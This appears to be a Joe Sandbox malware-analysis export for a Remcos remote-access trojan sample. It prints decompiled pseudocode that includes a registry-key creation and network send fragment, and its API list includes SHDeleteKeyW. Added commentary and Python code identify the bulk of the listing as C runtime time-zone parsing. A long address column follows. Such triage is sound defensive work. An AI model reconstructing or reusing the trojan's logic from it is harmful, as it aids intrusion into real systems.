                                                                      							_push(E00401F6B(E00401E25( &_v92, __edx, _t351, __eflags, _t330)));
                                                                      							_t174 = E00401F6B(E00401E25( &_v96, _t325, _t351, __eflags, 2));
                                                                      							_t176 = E00401F6B(E00401E25( &_v100, _t325, _t351, __eflags, 1));
                                                                      							_t332 = 0;
                                                                      							_t177 = E00401E25( &_v104, _t325, _t351, __eflags, 0);
                                                                      							_t378 = _t357 - 0x18;
                                                                      							E004020B6(_t207, _t378, _t325, __eflags, _t177);
                                                                      							_t179 = E004111F0(_t207, __eflags, _t174);
                                                                      							_t325 = _t176;
                                                                      							_t157 = E00410D43(_t179, _t176);
                                                                      							_t374 = _t378 + 0x28;
                                                                      						}
                                                                      					}
                                                                      					_t362 = _t374 - 0x18;
                                                                      					_t236 = _t374 - 0x18;
                                                                      					__eflags = _t157;
                                                                      					if(__eflags == 0) {
                                                                      						_push("5");
                                                                      						goto L29;
                                                                      					} else {
                                                                      						_push("4");
                                                                      						goto L18;
                                                                      					}
                                                                      				}
                                                                      				_t390 = _t344 != 1;
                                                                      				if(_t344 != 1) {
                                                                      					goto L35;
                                                                      				}
                                                                      				E0040413E(_t207,  &_v80, __edx, _t351, E00401F6B(E00401E25( &_v88, __edx, _t351, _t390, 1)));
                                                                      				_t184 = E00401EC4( &_v84);
                                                                      				_t185 = E00401E25( &_v96, __edx, _t351, _t390, 0);
                                                                      				_t380 = _t357 - 0x18;
                                                                      				E004020B6(_t207, _t380, _t325, _t390, _t185);
                                                                      				_t188 = RegCreateKeyExW(E004111F0(_t207, _t390, _t184), 0, 0, 0, 0x20006, 0,  &_v112, 0, ??);
                                                                      				_t349 = _t188;
                                                                      				RegCloseKey(_v120);
                                                                      				_t382 = _t380 + 0x18 - 0x18;
                                                                      				_t250 = _t380 + 0x18 - 0x18;
                                                                      				_t391 = _t188;
                                                                      				if(_t188 != 0) {
                                                                      					_push("7");
                                                                      					goto L10;
                                                                      				}
                                                                      				E00402053(_t207, _t250, _t325, _t351, "6");
                                                                      				_push(0x72);
                                                                      				E00404A78(0x46e7b8, _t325, _t391);
                                                                      				_t209 = E0040770B( &_v108, 0x46e7b8, 0x46e7b8);
                                                                      				_t392 = _t209 - 0xffffffff;
                                                                      				if(_t209 != 0xffffffff) {
                                                                      					_t14 = _t209 + 1; // 0x1
                                                                      					_t327 = 2;
                                                                      					_t195 = E004310E6( ~(__eflags > 0) | _t14 * _t327, _t14 * _t327 >> 0x20, _t349, __eflags);
                                                                      					E00439346(_t195, E00401EC4(E004076F1( &_v96,  &_v48, 0, _t209)));
                                                                      					E00401EC9();
                                                                      					E004020B6(_t209, _t382 - 0x18, _t14 * _t327 >> 0x20, __eflags, E00401E25( &_v120, _t14 * _t327 >> 0x20, _t351, __eflags, 0));
                                                                      					_t325 = 0;
                                                                      					E00411281(_t195, 0, __eflags,  ~(__eflags > 0) | _t14 * _t327);
                                                                      					E004310EF(_t195);
                                                                      					goto L34;
                                                                      				} else {
                                                                      					E004020B6(_t209, _t382 - 0x18, _t325, _t392, E00401E25( &_v108, _t325, _t351, _t392, 0));
                                                                      					_t325 = 0;
                                                                      					_t220 = 0;
                                                                      					goto L33;
                                                                      				}
                                                                      			}


                                                                      APIs
                                                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041153B
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00411547
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041183D
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00411844
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                      • API String ID: 2127411465-314212984
                                                                      • Opcode ID: 5d878569cfdc9c39262a3c816bedd7a7c85ca54580c4ef62714b668f3556edb2
                                                                      • Instruction ID: 6b87092ff92e7c26662d3c804290ab8ac8a3e1aac783564dfde44c8b7133d751
                                                                      • Opcode Fuzzy Hash: 5d878569cfdc9c39262a3c816bedd7a7c85ca54580c4ef62714b668f3556edb2
                                                                      • Instruction Fuzzy Hash: 3CE1D872A0430067C614B776DD679EF76A95F95308F00052FF902B71F2EE7D8A44829B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E004451D0(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				int _v16;
                                                                      				int _v20;
                                                                      				int _v24;
                                                                      				char _v52;
                                                                      				int _v56;
                                                                      				int _v60;
                                                                      				signed int _v100;
                                                                      				char _v272;
                                                                      				intOrPtr _v276;
                                                                      				char _v280;
                                                                      				char _v356;
                                                                      				char _v360;
                                                                      				void* __ebp;
                                                                      				signed int _t65;
                                                                      				signed int _t72;
                                                                      				signed int _t74;
                                                                      				signed int _t78;
                                                                      				signed int _t85;
                                                                      				signed int _t89;
                                                                      				signed int _t91;
                                                                      				long _t93;
                                                                      				signed int* _t96;
                                                                      				signed int _t99;
                                                                      				signed int _t102;
                                                                      				signed int _t106;
                                                                      				void* _t113;
                                                                      				signed int _t116;
                                                                      				void* _t117;
                                                                      				void* _t119;
                                                                      				void* _t120;
                                                                      				void* _t122;
                                                                      				signed int _t124;
                                                                      				signed int _t125;
                                                                      				signed int* _t128;
                                                                      				signed int _t129;
                                                                      				void* _t132;
                                                                      				void* _t134;
                                                                      				signed int _t135;
                                                                      				signed int _t137;
                                                                      				void* _t140;
                                                                      				intOrPtr _t141;
                                                                      				void* _t143;
                                                                      				signed int _t150;
                                                                      				signed int _t151;
                                                                      				signed int _t154;
                                                                      				signed int _t158;
                                                                      				signed int _t161;
                                                                      				intOrPtr* _t166;
                                                                      				signed int _t167;
                                                                      				intOrPtr* _t168;
                                                                      				void* _t169;
                                                                      				intOrPtr _t170;
                                                                      				void* _t171;
                                                                      				signed int _t172;
                                                                      				int _t176;
                                                                      				signed int _t178;
                                                                      				char** _t179;
                                                                      				signed int _t183;
                                                                      				signed int _t184;
                                                                      				void* _t191;
                                                                      				signed int _t192;
                                                                      				void* _t193;
                                                                      				signed int _t194;
                                                                      
                                                                      				_t178 = __esi;
                                                                      				_t171 = __edi;
                                                                      				_t65 = E00444E0F();
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t137 = _t65;
                                                                      				_v16 = _v16 & 0x00000000;
                                                                      				_v12 = _t137;
                                                                      				if(E00444E6D( &_v8) != 0 || E00444E15( &_v16) != 0) {
                                                                      					L46:
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					E00438659();
                                                                      					asm("int3");
                                                                      					_t191 = _t193;
                                                                      					_t194 = _t193 - 0x10;
                                                                      					_push(_t137);
                                                                      					_t179 = E00444E0F();
                                                                      					_v52 = 0;
                                                                      					_v56 = 0;
                                                                      					_v60 = 0;
                                                                      					_t72 = E00444E6D( &_v52);
                                                                      					_t143 = _t178;
                                                                      					__eflags = _t72;
                                                                      					if(_t72 != 0) {
                                                                      						L66:
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						E00438659();
                                                                      						asm("int3");
                                                                      						_push(_t191);
                                                                      						_t192 = _t194;
                                                                      						_t74 =  *0x46c00c; // 0xe1ce05e9
                                                                      						_v100 = _t74 ^ _t192;
                                                                      						 *0x46c334 =  *0x46c334 | 0xffffffff;
                                                                      						 *0x46c328 =  *0x46c328 | 0xffffffff;
                                                                      						_push(0);
                                                                      						_push(_t179);
                                                                      						_push(_t171);
                                                                      						_t139 = "TZ";
                                                                      						_t172 = 0;
                                                                      						 *0x46d748 = 0;
                                                                      						_t78 = E00438A25(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                                                                      						__eflags = _t78;
                                                                      						if(_t78 != 0) {
                                                                      							__eflags = _t78 - 0x22;
                                                                      							if(_t78 == 0x22) {
                                                                      								_t184 = E004421F7(_t143, _v276);
                                                                      								__eflags = _t184;
                                                                      								if(__eflags != 0) {
                                                                      									_t85 = E00438A25(__eflags,  &_v280, _t184, _v276, _t139);
                                                                      									__eflags = _t85;
                                                                      									if(_t85 == 0) {
                                                                      										E004427C2(0);
                                                                      										_t172 = _t184;
                                                                      									} else {
                                                                      										_push(_t184);
                                                                      										goto L72;
                                                                      									}
                                                                      								} else {
                                                                      									_push(0);
                                                                      									L72:
                                                                      									E004427C2();
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t172 =  &_v272;
                                                                      						}
                                                                      						asm("sbb esi, esi");
                                                                      						_t183 =  ~(_t172 -  &_v272) & _t172;
                                                                      						__eflags = _t172;
                                                                      						if(_t172 == 0) {
                                                                      							L80:
                                                                      							L47();
                                                                      						} else {
                                                                      							__eflags =  *_t172;
                                                                      							if(__eflags == 0) {
                                                                      								goto L80;
                                                                      							} else {
                                                                      								_push(_t172);
                                                                      								E004451D0(_t139, _t172, _t183, __eflags);
                                                                      							}
                                                                      						}
                                                                      						E004427C2(_t183);
                                                                      						__eflags = _v16 ^ _t192;
                                                                      						return E004318FB(_v16 ^ _t192);
                                                                      					} else {
                                                                      						_t89 = E00444E15( &_v16);
                                                                      						_pop(_t143);
                                                                      						__eflags = _t89;
                                                                      						if(_t89 != 0) {
                                                                      							goto L66;
                                                                      						} else {
                                                                      							_t91 = E00444E41( &_v20);
                                                                      							_pop(_t143);
                                                                      							__eflags = _t91;
                                                                      							if(_t91 != 0) {
                                                                      								goto L66;
                                                                      							} else {
                                                                      								E004427C2( *0x46d740);
                                                                      								 *0x46d740 = 0;
                                                                      								 *_t194 = 0x46d750;
                                                                      								_t93 = GetTimeZoneInformation(??);
                                                                      								__eflags = _t93 - 0xffffffff;
                                                                      								if(_t93 != 0xffffffff) {
                                                                      									_t150 =  *0x46d750 * 0x3c;
                                                                      									_t167 =  *0x46d7a4; // 0x0
                                                                      									_push(_t171);
                                                                      									 *0x46d748 = 1;
                                                                      									_v12 = _t150;
                                                                      									__eflags =  *0x46d796; // 0x0
                                                                      									if(__eflags != 0) {
                                                                      										_t151 = _t150 + _t167 * 0x3c;
                                                                      										__eflags = _t151;
                                                                      										_v12 = _t151;
                                                                      									}
                                                                      									__eflags =  *0x46d7ea; // 0x0
                                                                      									if(__eflags == 0) {
                                                                      										L56:
                                                                      										_v16 = 0;
                                                                      										_v20 = 0;
                                                                      									} else {
                                                                      										_t106 =  *0x46d7f8; // 0x0
                                                                      										__eflags = _t106;
                                                                      										if(_t106 == 0) {
                                                                      											goto L56;
                                                                      										} else {
                                                                      											_v16 = 1;
                                                                      											_v20 = (_t106 - _t167) * 0x3c;
                                                                      										}
                                                                      									}
                                                                      									_t176 = E00441DC6(0, _t167);
                                                                      									_t99 = WideCharToMultiByte(_t176, 0, 0x46d754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                                                                      									__eflags = _t99;
                                                                      									if(_t99 == 0) {
                                                                      										L60:
                                                                      										 *( *_t179) = 0;
                                                                      									} else {
                                                                      										__eflags = _v24;
                                                                      										if(_v24 != 0) {
                                                                      											goto L60;
                                                                      										} else {
                                                                      											( *_t179)[0x3f] = 0;
                                                                      										}
                                                                      									}
                                                                      									_t102 = WideCharToMultiByte(_t176, 0, 0x46d7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                                                                      									__eflags = _t102;
                                                                      									if(_t102 == 0) {
                                                                      										L64:
                                                                      										 *(_t179[1]) = 0;
                                                                      									} else {
                                                                      										__eflags = _v24;
                                                                      										if(_v24 != 0) {
                                                                      											goto L64;
                                                                      										} else {
                                                                      											_t179[1][0x3f] = 0;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								 *(E00444E09()) = _v12;
                                                                      								 *((intOrPtr*)(E00444DFD())) = _v16;
                                                                      								_t96 = E00444E03();
                                                                      								 *_t96 = _v20;
                                                                      								return _t96;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					_t168 =  *0x46d740; // 0x0
                                                                      					_t178 = _a4;
                                                                      					if(_t168 == 0) {
                                                                      						L12:
                                                                      						E004427C2(_t168);
                                                                      						_t154 = _t178;
                                                                      						_t12 = _t154 + 1; // 0x4455c1
                                                                      						_t169 = _t12;
                                                                      						do {
                                                                      							_t113 =  *_t154;
                                                                      							_t154 = _t154 + 1;
                                                                      						} while (_t113 != 0);
                                                                      						_t13 = _t154 - _t169 + 1; // 0x4455c2
                                                                      						 *0x46d740 = E004421F7(_t154 - _t169, _t13);
                                                                      						_t116 = E004427C2(0);
                                                                      						_t170 =  *0x46d740; // 0x0
                                                                      						if(_t170 == 0) {
                                                                      							goto L45;
                                                                      						} else {
                                                                      							_t158 = _t178;
                                                                      							_push(_t171);
                                                                      							_t14 = _t158 + 1; // 0x4455c1
                                                                      							_t171 = _t14;
                                                                      							do {
                                                                      								_t117 =  *_t158;
                                                                      								_t158 = _t158 + 1;
                                                                      							} while (_t117 != 0);
                                                                      							_t15 = _t158 - _t171 + 1; // 0x4455c2
                                                                      							_t119 = E0043DAD7(_t170, _t15, _t178);
                                                                      							_t193 = _t193 + 0xc;
                                                                      							if(_t119 == 0) {
                                                                      								_t171 = 3;
                                                                      								_push(_t171);
                                                                      								_t120 = E0043AD93(_t159,  *_t137, 0x40, _t178);
                                                                      								_t193 = _t193 + 0x10;
                                                                      								if(_t120 == 0) {
                                                                      									while( *_t178 != 0) {
                                                                      										_t178 = _t178 + 1;
                                                                      										_t171 = _t171 - 1;
                                                                      										if(_t171 != 0) {
                                                                      											continue;
                                                                      										}
                                                                      										break;
                                                                      									}
                                                                      									_pop(_t171);
                                                                      									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                                                                      									if(_t137 != 0) {
                                                                      										_t178 = _t178 + 1;
                                                                      									}
                                                                      									_t161 = E004383EC(_t159, _t178) * 0xe10;
                                                                      									_v8 = _t161;
                                                                      									while(1) {
                                                                      										_t122 =  *_t178;
                                                                      										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                                                                      											break;
                                                                      										}
                                                                      										_t178 = _t178 + 1;
                                                                      									}
                                                                      									__eflags =  *_t178 - 0x3a;
                                                                      									if( *_t178 == 0x3a) {
                                                                      										_t178 = _t178 + 1;
                                                                      										_t161 = _v8 + E004383EC(_t161, _t178) * 0x3c;
                                                                      										_v8 = _t161;
                                                                      										while(1) {
                                                                      											_t132 =  *_t178;
                                                                      											__eflags = _t132 - 0x30;
                                                                      											if(_t132 < 0x30) {
                                                                      												break;
                                                                      											}
                                                                      											__eflags = _t132 - 0x39;
                                                                      											if(_t132 <= 0x39) {
                                                                      												_t178 = _t178 + 1;
                                                                      												__eflags = _t178;
                                                                      												continue;
                                                                      											}
                                                                      											break;
                                                                      										}
                                                                      										__eflags =  *_t178 - 0x3a;
                                                                      										if( *_t178 == 0x3a) {
                                                                      											_t178 = _t178 + 1;
                                                                      											_t161 = _v8 + E004383EC(_t161, _t178);
                                                                      											_v8 = _t161;
                                                                      											while(1) {
                                                                      												_t134 =  *_t178;
                                                                      												__eflags = _t134 - 0x30;
                                                                      												if(_t134 < 0x30) {
                                                                      													goto L38;
                                                                      												}
                                                                      												__eflags = _t134 - 0x39;
                                                                      												if(_t134 <= 0x39) {
                                                                      													_t178 = _t178 + 1;
                                                                      													__eflags = _t178;
                                                                      													continue;
                                                                      												}
                                                                      												goto L38;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									L38:
                                                                      									__eflags = _t137;
                                                                      									if(_t137 != 0) {
                                                                      										_v8 = _t161;
                                                                      									}
                                                                      									__eflags =  *_t178;
                                                                      									_t124 = 0 |  *_t178 != 0x00000000;
                                                                      									_v16 = _t124;
                                                                      									__eflags = _t124;
                                                                      									_t125 = _v12;
                                                                      									if(_t124 == 0) {
                                                                      										_t29 = _t125 + 4; // 0xfffffddd
                                                                      										 *((char*)( *_t29)) = 0;
                                                                      										L44:
                                                                      										 *(E00444E09()) = _v8;
                                                                      										_t128 = E00444DFD();
                                                                      										 *_t128 = _v16;
                                                                      										return _t128;
                                                                      									}
                                                                      									_push(3);
                                                                      									_t28 = _t125 + 4; // 0xfffffddd
                                                                      									_t129 = E0043AD93(_t161,  *_t28, 0x40, _t178);
                                                                      									_t193 = _t193 + 0x10;
                                                                      									__eflags = _t129;
                                                                      									if(_t129 == 0) {
                                                                      										goto L44;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L46;
                                                                      						}
                                                                      					} else {
                                                                      						_t166 = _t168;
                                                                      						_t135 = _t178;
                                                                      						while(1) {
                                                                      							_t140 =  *_t135;
                                                                      							if(_t140 !=  *_t166) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t140 == 0) {
                                                                      								L8:
                                                                      								_t116 = 0;
                                                                      							} else {
                                                                      								_t9 = _t135 + 1; // 0xdde805eb
                                                                      								_t141 =  *_t9;
                                                                      								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                                                                      									break;
                                                                      								} else {
                                                                      									_t135 = _t135 + 2;
                                                                      									_t166 = _t166 + 2;
                                                                      									if(_t141 != 0) {
                                                                      										continue;
                                                                      									} else {
                                                                      										goto L8;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L10:
                                                                      							if(_t116 == 0) {
                                                                      								L45:
                                                                      								return _t116;
                                                                      							} else {
                                                                      								_t137 = _v12;
                                                                      								goto L12;
                                                                      							}
                                                                      							goto L82;
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						_t116 = _t135 | 0x00000001;
                                                                      						__eflags = _t116;
                                                                      						goto L10;
                                                                      					}
                                                                      				}
                                                                      				L82:
                                                                      			}
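The listing above has the shape of the C runtime's time-zone initialisation (`_tzset`) rather than anything specific to this sample: a three-byte copy into a 64-byte name buffer, an optional leading `-`, a number multiplied by 0xe10 (3600), an optional `:` part multiplied by 0x3c (60), an optional `:` seconds part, and a trailing daylight-name copy; the other branch calls GetTimeZoneInformation into a global at 0x46d750 and reads offsets that match TIME_ZONE_INFORMATION (StandardDate.wMonth at +0x46, StandardBias at +0x54, DaylightDate.wMonth at +0x9a, DaylightBias at +0xa8), then converts the two 32-WCHAR names with WideCharToMultiByte into 63-byte targets. For triage of this Remcos sample that means the routine is statically linked runtime code, not the malware's own logic. The following is an added example written for this report, not code from the sample, from Joe Sandbox or from Microsoft's CRT: it re-implements both paths in Python so the constants and offsets in the decompile can be checked against readable logic. The TZ strings and the packed TIME_ZONE_INFORMATION buffer it uses are constructed test inputs.

```python
"""TZ handling with the same shape as the decompiled routine above.

Added example for this report; not code from the sample or from Joe Sandbox.
It mirrors two paths visible in the listing:
  * parse_tz():  the TZ-string path (3-char name, optional '-', hours*0xe10,
                 optional ':'minutes*0x3c, optional ':'seconds, trailing DST name);
  * from_tzi():  the GetTimeZoneInformation path, reading the same
                 TIME_ZONE_INFORMATION offsets the listing touches.
"""
import re
import struct
from dataclasses import dataclass
from typing import Optional


@dataclass
class TzState:
    tzname_std: str
    tzname_dst: str
    timezone: int            # seconds west of UTC (CRT _timezone)
    daylight: int            # CRT _daylight
    dstbias: Optional[int]   # CRT _dstbias; the TZ-string path leaves it unset


def _atol(s: str) -> int:
    """C atol(): optional whitespace and sign, then leading decimal digits, else 0."""
    m = re.match(r"[ \t\n\r\f\v]*([+-]?)([0-9]*)", s)
    sign, digits = m.group(1), m.group(2)
    if not digits:
        return 0
    return -int(digits) if sign == "-" else int(digits)


def _isdigit(c: str) -> bool:
    return "0" <= c <= "9"


def parse_tz(tz: str) -> TzState:
    """TZ string of the form NNN[+|-]hh[:mm[:ss]][DDD], parsed as the listing does."""
    std = tz[:3]                        # strncpy_s(tzname[0], 0x40, TZ, 3)
    p = min(3, len(tz))                 # skip up to three non-NUL name bytes
    negative = tz[p:p + 1] == "-"       # '-' (0x2d) check
    if negative:
        p += 1
    seconds = _atol(tz[p:]) * 3600      # * 0xe10
    while p < len(tz) and (tz[p] == "+" or _isdigit(tz[p])):   # skip '+' / '0'..'9'
        p += 1
    if tz[p:p + 1] == ":":              # 0x3a
        p += 1
        seconds += _atol(tz[p:]) * 60   # * 0x3c
        while p < len(tz) and _isdigit(tz[p]):
            p += 1
        if tz[p:p + 1] == ":":
            p += 1
            seconds += _atol(tz[p:])
            while p < len(tz) and _isdigit(tz[p]):
                p += 1
    if negative:
        seconds = -seconds
    daylight = 1 if p < len(tz) else 0  # _daylight = (*TZ != 0)
    dst = tz[p:p + 3] if daylight else ""   # strncpy_s(tzname[1], 0x40, TZ, 3)
    return TzState(std, dst, seconds, daylight, None)


# TIME_ZONE_INFORMATION: Bias, StandardName[32], StandardDate, StandardBias,
# DaylightName[32], DaylightDate, DaylightBias (172 bytes). SYSTEMTIME is eight
# WORDs with wMonth second, so wMonth sits at +0x46 and +0x9a.
_TZI_FMT = "<l64s8Hl64s8Hl"


def make_tzi(bias, std_name, std_month, std_bias, dst_name, dst_month, dst_bias) -> bytes:
    """Constructed TIME_ZONE_INFORMATION buffer (test input, not captured data)."""
    std_date = (0, std_month, 0, 0, 0, 0, 0, 0)
    dst_date = (0, dst_month, 0, 0, 0, 0, 0, 0)
    return struct.pack(_TZI_FMT, bias, std_name.encode("utf-16-le"), *std_date, std_bias,
                       dst_name.encode("utf-16-le"), *dst_date, dst_bias)


def _wide_name(buf: bytes, off: int) -> str:
    """WideCharToMultiByte of a 32-WCHAR field into a 63-byte (0x3f) target."""
    return buf[off:off + 64].decode("utf-16-le").split("\0")[0][:63]


def from_tzi(buf: bytes) -> TzState:
    """The no-TZ path: derive _timezone/_daylight/_dstbias from the struct."""
    assert len(buf) == struct.calcsize(_TZI_FMT)
    bias = struct.unpack_from("<l", buf, 0x00)[0]        # *0x46d750
    std_month = struct.unpack_from("<H", buf, 0x46)[0]   # *0x46d796
    std_bias = struct.unpack_from("<l", buf, 0x54)[0]    # *0x46d7a4
    dst_month = struct.unpack_from("<H", buf, 0x9a)[0]   # *0x46d7ea
    dst_bias = struct.unpack_from("<l", buf, 0xa8)[0]    # *0x46d7f8
    timezone = bias * 60
    if std_month:
        timezone += std_bias * 60
    if dst_month and dst_bias:
        daylight, dstbias = 1, (dst_bias - std_bias) * 60
    else:
        daylight, dstbias = 0, 0
    return TzState(_wide_name(buf, 0x04), _wide_name(buf, 0x58), timezone, daylight, dstbias)


if __name__ == "__main__":
    print(parse_tz("EST5EDT"))
    print(from_tzi(make_tzi(300, "Eastern Standard Time", 11, 0, "Eastern Daylight Time", 3, -60)))
```

When the same constants (0xe10, 0x3c, 0x3f, a 172-byte global read at +0x46/+0x54/+0x9a/+0xa8) show up in another decompiled function, the sample's own behaviour is more likely in the callers of this routine than in the routine itself.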
Instruction address column that accompanied the decompiled listing (0x00000000 marks entries with no instruction address):

0x004451d0 0x004451d0 0x004451da 0x004451df 0x004451e3 0x004451e5 0x004451ed 0x004451f8
0x00445398 0x0044539a 0x0044539b 0x0044539c 0x0044539d 0x0044539e 0x0044539f 0x004453a4
0x004453a8 0x004453aa 0x004453ad 0x004453b4 0x004453bb 0x004453bf 0x004453c2 0x004453c5
0x004453ca 0x004453cb 0x004453cd 0x004454f5 0x004454f5 0x004454f6 0x004454f7 0x004454f8
0x004454f9 0x004454fa 0x004454ff 0x00445502 0x00445503 0x0044550b 0x00445512 0x00445515
0x00445522 0x00445529 0x0044552a 0x0044552b 0x0044552c 0x00445531 0x00445540 0x00445547
0x0044554f 0x00445551 0x0044555b 0x0044555e 0x0044556b 0x0044556e 0x00445570 0x00445589
0x00445591 0x00445593 0x00445599 0x0044559e 0x00445595 0x00445595 0x00000000 0x00445595
0x00445572 0x00445572 0x00445573 0x00445573 0x00445573 0x004455a0 0x00445553 0x00445553
0x00445553 0x004455ad 0x004455af 0x004455b1 0x004455b3 0x004455c3 0x004455c3 0x004455b5
0x004455b5 0x004455b8 0x00000000 0x004455ba 0x004455ba 0x004455bb 0x004455c0 0x004455b8
0x004455c9 0x004455d4 0x004455df 0x004453d3 0x004453d7 0x004453dc 0x004453dd 0x004453df
0x00000000 0x004453e5 0x004453e9 0x004453ee 0x004453ef
                                                                      0x004453f1
                                                                      0x00000000
                                                                      0x004453f7
                                                                      0x004453fd
                                                                      0x00445402
                                                                      0x00445408
                                                                      0x0044540f
                                                                      0x00445415
                                                                      0x00445418
                                                                      0x0044541e
                                                                      0x00445425
                                                                      0x0044542b
                                                                      0x0044542f
                                                                      0x00445435
                                                                      0x00445438
                                                                      0x0044543f
                                                                      0x00445444
                                                                      0x00445444
                                                                      0x00445446
                                                                      0x00445446
                                                                      0x00445449
                                                                      0x00445450
                                                                      0x00445468
                                                                      0x00445468
                                                                      0x0044546b
                                                                      0x00445452
                                                                      0x00445452
                                                                      0x00445457
                                                                      0x00445459
                                                                      0x00000000
                                                                      0x0044545b
                                                                      0x0044545d
                                                                      0x00445463
                                                                      0x00445463
                                                                      0x00445459
                                                                      0x00445473
                                                                      0x00445487
                                                                      0x0044548d
                                                                      0x0044548f
                                                                      0x0044549d
                                                                      0x0044549f
                                                                      0x00445491
                                                                      0x00445491
                                                                      0x00445494
                                                                      0x00000000
                                                                      0x00445496
                                                                      0x00445498
                                                                      0x00445498
                                                                      0x00445494
                                                                      0x004454b4
                                                                      0x004454bb
                                                                      0x004454bd
                                                                      0x004454cc
                                                                      0x004454cf
                                                                      0x004454bf
                                                                      0x004454bf
                                                                      0x004454c2
                                                                      0x00000000
                                                                      0x004454c4
                                                                      0x004454c7
                                                                      0x004454c7
                                                                      0x004454c2
                                                                      0x004454bd
                                                                      0x004454d9
                                                                      0x004454e3
                                                                      0x004454e8
                                                                      0x004454ed
                                                                      0x004454f4
                                                                      0x004454f4
                                                                      0x004453f1
                                                                      0x004453df
                                                                      0x00445210
                                                                      0x00445210
                                                                      0x00445216
                                                                      0x0044521b
                                                                      0x00445251
                                                                      0x00445252
                                                                      0x00445258
                                                                      0x0044525a
                                                                      0x0044525a
                                                                      0x0044525d
                                                                      0x0044525d
                                                                      0x0044525f
                                                                      0x00445260
                                                                      0x00445266
                                                                      0x00445271
                                                                      0x00445276
                                                                      0x0044527b
                                                                      0x00445285
                                                                      0x00000000
                                                                      0x0044528b
                                                                      0x0044528b
                                                                      0x0044528d
                                                                      0x0044528e
                                                                      0x0044528e
                                                                      0x00445291
                                                                      0x00445291
                                                                      0x00445293
                                                                      0x00445294
                                                                      0x0044529b
                                                                      0x004452a0
                                                                      0x004452a5
                                                                      0x004452aa
                                                                      0x004452b2
                                                                      0x004452b3
                                                                      0x004452b9
                                                                      0x004452be
                                                                      0x004452c3
                                                                      0x004452c9
                                                                      0x004452ce
                                                                      0x004452cf
                                                                      0x004452d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004452d2
                                                                      0x004452d7
                                                                      0x004452d8
                                                                      0x004452dd
                                                                      0x004452df
                                                                      0x004452df
                                                                      0x004452e7
                                                                      0x004452ed
                                                                      0x004452f0
                                                                      0x004452f0
                                                                      0x004452f4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004452fe
                                                                      0x004452fe
                                                                      0x00445301
                                                                      0x00445304
                                                                      0x00445306
                                                                      0x00445314
                                                                      0x00445316
                                                                      0x00445320
                                                                      0x00445320
                                                                      0x00445322
                                                                      0x00445324
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044531b
                                                                      0x0044531d
                                                                      0x0044531f
                                                                      0x0044531f
                                                                      0x00000000
                                                                      0x0044531f
                                                                      0x00000000
                                                                      0x0044531d
                                                                      0x00445326
                                                                      0x00445329
                                                                      0x0044532b
                                                                      0x00445336
                                                                      0x00445338
                                                                      0x00445342
                                                                      0x00445342
                                                                      0x00445344
                                                                      0x00445346
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044533d
                                                                      0x0044533f
                                                                      0x00445341
                                                                      0x00445341
                                                                      0x00000000
                                                                      0x00445341
                                                                      0x00000000
                                                                      0x0044533f
                                                                      0x00445342
                                                                      0x00445329
                                                                      0x00445348
                                                                      0x00445348
                                                                      0x0044534a
                                                                      0x0044534e
                                                                      0x0044534e
                                                                      0x00445353
                                                                      0x00445355
                                                                      0x00445358
                                                                      0x0044535b
                                                                      0x0044535d
                                                                      0x00445360
                                                                      0x00445378
                                                                      0x0044537b
                                                                      0x0044537e
                                                                      0x00445386
                                                                      0x0044538b
                                                                      0x00445390
                                                                      0x00000000
                                                                      0x00445390
                                                                      0x00445362
                                                                      0x00445367
                                                                      0x0044536a
                                                                      0x0044536f
                                                                      0x00445372
                                                                      0x00445374
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445376
                                                                      0x004452c3
                                                                      0x00000000
                                                                      0x004452aa
                                                                      0x0044521d
                                                                      0x0044521d
                                                                      0x0044521f
                                                                      0x00445221
                                                                      0x00445221
                                                                      0x00445225
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00445229
                                                                      0x0044523d
                                                                      0x0044523d
                                                                      0x0044522b
                                                                      0x0044522b
                                                                      0x0044522b
                                                                      0x00445231
                                                                      0x00000000
                                                                      0x00445233
                                                                      0x00445233
                                                                      0x00445236
                                                                      0x0044523b
                                                                      0x00000000
                                                                      0x00000000
